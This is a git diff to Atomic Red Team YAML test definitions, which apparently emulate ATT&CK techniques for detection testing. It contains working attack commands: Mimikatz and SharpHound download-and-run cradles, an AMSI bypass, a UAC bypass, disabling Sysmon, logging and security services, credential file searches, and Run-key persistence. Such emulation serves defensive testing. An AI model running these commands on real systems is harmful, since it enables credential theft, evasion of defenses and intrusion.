diff --git a/atomics/T1081/T1081.yaml b/atomics/T1081/T1081.yaml index 342f3b95..bc2deeae 100644 --- a/atomics/T1081/T1081.yaml +++ b/atomics/T1081/T1081.yaml @@ -31,18 +31,6 @@ atomic_tests: command: | grep -ri password #{file_path} -- name: Runs Mimikatz & Mimikittenz by name - description: | - Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module. - supported_platforms: - - windows - executor: - name: powershell - elevation_required: true - command: | - invoke-mimikittenz - mimikatz.exe - - name: Extracting passwords with findstr description: | Extracting Credentials from Files @@ -54,17 +42,16 @@ atomic_tests: command: | findstr /si pass *.xml | *.doc | *.txt | *.xls ls -R | select-string -Pattern password - -- name: Access "unattend.xml" + +- name: Access unattend.xml description: | Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. - + supported_platforms: - windows executor: name: command_prompt elevation_required: true command: | - cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1 - cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1 - + type C:\Windows\Panther\unattend.xml > nul 2>&1 + type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1 diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml index 177028c8..f1b3aa51 100644 --- a/atomics/T1086/T1086.yaml +++ b/atomics/T1086/T1086.yaml @@ -6,16 +6,13 @@ atomic_tests: - name: Mimikatz description: | Download Mimikatz and dump credentials - supported_platforms: - windows - input_arguments: mimurl: description: Mimikatz url type: url default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 - executor: name: command_prompt elevation_required: true @@ -25,16 +22,13 @@ atomic_tests: - name: BloodHound description: | Download Bloodhound and run it - supported_platforms: - windows - input_arguments: bloodurl: description: BloodHound URL type: url default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1 - executor: name: command_prompt elevation_required: false @@ -45,10 +39,8 @@ atomic_tests: description: | Different obfuscated methods to test Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" - supported_platforms: - windows - executor: name: powershell elevation_required: false @@ -60,10 +52,8 @@ atomic_tests: - name: Mimikatz - Cradlecraft PsSendKeys description: | Run mimikatz via PsSendKeys - supported_platforms: - windows - executor: name: powershell elevation_required: true @@ -73,12 +63,9 @@ atomic_tests: - name: Invoke-AppPathBypass description: | Note: Windows 10 only - Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ - supported_platforms: - windows - executor: name: command_prompt elevation_required: false @@ -88,10 +75,8 @@ atomic_tests: - name: PowerShell Add User description: | Using PS 5.1, add a user via CLI - supported_platforms: - windows - input_arguments: user_name: description: username to add @@ -120,16 +105,13 @@ atomic_tests: Provided by https://github.com/mgreen27/mgreen27.github.io Powershell MsXml COM object. Not proxy aware removing cache although does not appear to write to those locations - supported_platforms: - windows - input_arguments: url: description: url of payload to execute type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1 - executor: name: command_prompt elevation_required: false @@ -141,16 +123,13 @@ atomic_tests: Provided by https://github.com/mgreen27/mgreen27.github.io Powershell MsXml COM object. Not proxy aware removing cache although does not appear to write to those locations - supported_platforms: - windows - input_arguments: url: description: url of payload to execute type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1 - executor: name: command_prompt elevation_required: false @@ -161,16 +140,13 @@ atomic_tests: description: | Provided by https://github.com/mgreen27/mgreen27.github.io Powershell xml download request - supported_platforms: - windows - input_arguments: url: description: url of payload to execute type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml - executor: name: command_prompt elevation_required: false @@ -181,16 +157,13 @@ atomic_tests: description: | Provided by https://github.com/mgreen27/mgreen27.github.io Powershell invoke mshta to download payload - supported_platforms: - windows - input_arguments: url: description: url of payload to execute type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct - executor: name: powershell elevation_required: false @@ -201,10 +174,8 @@ atomic_tests: description: | Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. - supported_platforms: - windows - executor: name: manual steps: | @@ -214,10 +185,8 @@ atomic_tests: - name: PowerShell Fileless Script Execution description: | Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. - supported_platforms: - windows - executor: name: powershell elevation_required: false @@ -228,14 +197,12 @@ atomic_tests: cleanup_command: | cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f - + - name: PowerShell Downgrade Attack description: | Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - supported_platforms: - - windows - + - windows executor: name: powershell elevation_required: false @@ -247,16 +214,13 @@ atomic_tests: - name: NTFS Alternate Data Stream Access description: | Creates a file with an alternate data stream and simulates executing that hidden code/file - supported_platforms: - windows - input_arguments: ads_file: description: File created to store Alternate Stream Data type: String default: $env:TEMP\NTFS_ADS.txt - executor: name: powershell elevation_required: false @@ -268,4 +232,3 @@ atomic_tests: Invoke-Expression $streamcommand cleanup_command: | Remove:Item #{ads_file} - diff --git a/atomics/T1089/T1089.yaml b/atomics/T1089/T1089.yaml index 86b5e4c7..6608f7fb 100644 --- a/atomics/T1089/T1089.yaml +++ b/atomics/T1089/T1089.yaml @@ -98,7 +98,7 @@ atomic_tests: - name: Unload Sysmon Filter Driver description: | - Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. + Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. supported_platforms: - windows input_arguments: @@ -120,7 +120,7 @@ atomic_tests: - name: Disable Windows IIS HTTP Logging description: | - Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). + Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. supported_platforms: - windows @@ -130,17 +130,19 @@ atomic_tests: type: string default: Default Web Site executor: - name: command_prompt + name: powershell + prereq_command: | + if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1} command: | C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true + cleanup_command: | + C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false - name: Uninstall Sysmon description: | Uninstall Sysinternals Sysmon for Defense Evasion - supported_platforms: - windows - executor: name: command_prompt elevation_required: true @@ -153,11 +155,10 @@ atomic_tests: - name: AMSI Bypass - AMSI InitFailed description: | - Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. + Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ supported_platforms: - windows - executor: name: powershell elevation_required: false @@ -169,11 +170,9 @@ atomic_tests: - name: AMSI Bypass - Remove AMSI Provider Reg Key description: | With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. - This test removes the Windows Defender provider registry key. - + This test removes the Windows Defender provider registry key. supported_platforms: - windows - executor: name: powershell elevation_required: true @@ -184,7 +183,7 @@ atomic_tests: - name: Disable Arbitrary Security Windows Service description: | - With administrative rights, an adversary can disable Windows Services related to security products. + With administrative rights, an adversary can disable Windows Services related to security products. supported_platforms: - windows input_arguments: @@ -204,7 +203,7 @@ atomic_tests: - name: Disable PowerShell Script Block Logging description: | - An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. + An adversary may disable PowerShell Script Block Logging to avoid leaving evidence. Credit to Matt Graeber (@mattifestation) for the research. supported_platforms: @@ -225,7 +224,7 @@ atomic_tests: - name: PowerShell Bypass of AntiMalware Scripting Interface description: | - An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. + An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code. Credit to Matt Graeber (@mattifestation) for the research. supported_platforms: @@ -234,4 +233,4 @@ atomic_tests: name: powershell elevation_required: false command: | - [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) \ No newline at end of file + [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) diff --git a/atomics/T1100/T1100.yaml b/atomics/T1100/T1100.yaml index 1dc70f1f..db0d4bb9 100644 --- a/atomics/T1100/T1100.yaml +++ b/atomics/T1100/T1100.yaml @@ -8,7 +8,6 @@ atomic_tests: This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx - supported_platforms: - windows input_arguments: @@ -24,3 +23,5 @@ atomic_tests: name: command_prompt command: | xcopy #{web_shells} #{web_shell_path} + cleanup_command: | + del #{web_shell_path} diff --git a/atomics/T1107/T1107.yaml b/atomics/T1107/T1107.yaml index e4414263..240699ae 100644 --- a/atomics/T1107/T1107.yaml +++ b/atomics/T1107/T1107.yaml @@ -55,48 +55,36 @@ atomic_tests: Delete a single file from the temporary directory using cmd.exe supported_platforms: - windows - input_arguments: - file_to_delete: - description: Path of file to delete - type: Path - default: C:\Windows\Temp\victim-files-cmd\a executor: name: command_prompt elevation_required: false command: | - del /f #{file_to_delete} + echo "T1107" > %temp%\T1107.txt + del /f %temp%\T1107.txt - name: Delete an entire folder - Windows cmd description: | Recursively delete the temporary directory and all files contained within it using cmd.exe supported_platforms: - windows - input_arguments: - folder_to_delete: - description: Path of folder to delete - type: Path - default: C:\Windows\Temp\victim-files-cmd executor: name: command_prompt elevation_required: false command: | - del /f /S #{folder_to_delete} + mkdir %temp%\T1107 + rmdir /s /q %temp%\T1107 - name: Delete a single file - Windows PowerShell description: | Delete a single file from the temporary directory using Powershell supported_platforms: - windows - input_arguments: - file_to_delete: - description: Path of file to delete - type: Path - default: C:\Windows\Temp\victim-files-ps\a executor: name: powershell elevation_required: false command: | - Remove-Item -path "#{file_to_delete}" + New-Item $env:TEMP\T1107.txt + Remove-Item -path $env:TEMP\T1107.txt - name: Delete an entire folder - Windows PowerShell description: | @@ -112,7 +100,8 @@ atomic_tests: name: powershell elevation_required: false command: | - Remove-Item -path "#{folder_to_delete}" -recurse + New-Item $env:TEMP\T1107 -ItemType Directory + Remove-Item -path $env:TEMP\T1107 -recurse - name: Delete VSS - vssadmin description: | @@ -143,13 +132,14 @@ atomic_tests: - windows executor: name: command_prompt + elevation_required: true command: | bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no - name: wbadmin description: | - This test deletes Windows Backup catalogs. + This test deletes Windows Backup catalogs. supported_platforms: - windows executor: diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 204b2e27..ded624db 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -10,9 +10,11 @@ atomic_tests: - windows executor: name: command_prompt - elevation_required: false + elevation_required: true command: | reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f + cleanup_command: | + reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f - name: Modify Registry of Local Machine - cmd description: | @@ -25,6 +27,8 @@ atomic_tests: elevation_required: true command: | reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f + cleanup_command: | + reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f - name: Modify Registry of Another User Profile description: | @@ -90,7 +94,7 @@ atomic_tests: - name: Modify registry to store logon credentials description: | - Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping) + Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping) supported_platforms: - windows executor: @@ -129,4 +133,4 @@ atomic_tests: $EncodedCommand Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand cleanup_command: | - Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage} \ No newline at end of file + Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}